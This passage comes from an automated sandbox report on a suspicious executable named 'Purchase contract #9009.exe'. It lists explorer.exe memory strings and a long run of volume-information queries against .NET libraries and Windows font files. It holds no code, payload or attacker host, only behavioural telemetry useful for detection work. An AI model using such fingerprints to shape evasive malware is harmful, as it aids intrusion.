Source: explorer.exe, 00000005.00000000.665573323.0000000001080000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.681965378.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Users\user\Desktop\Purchase contract #9009.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation			Jump to behavior
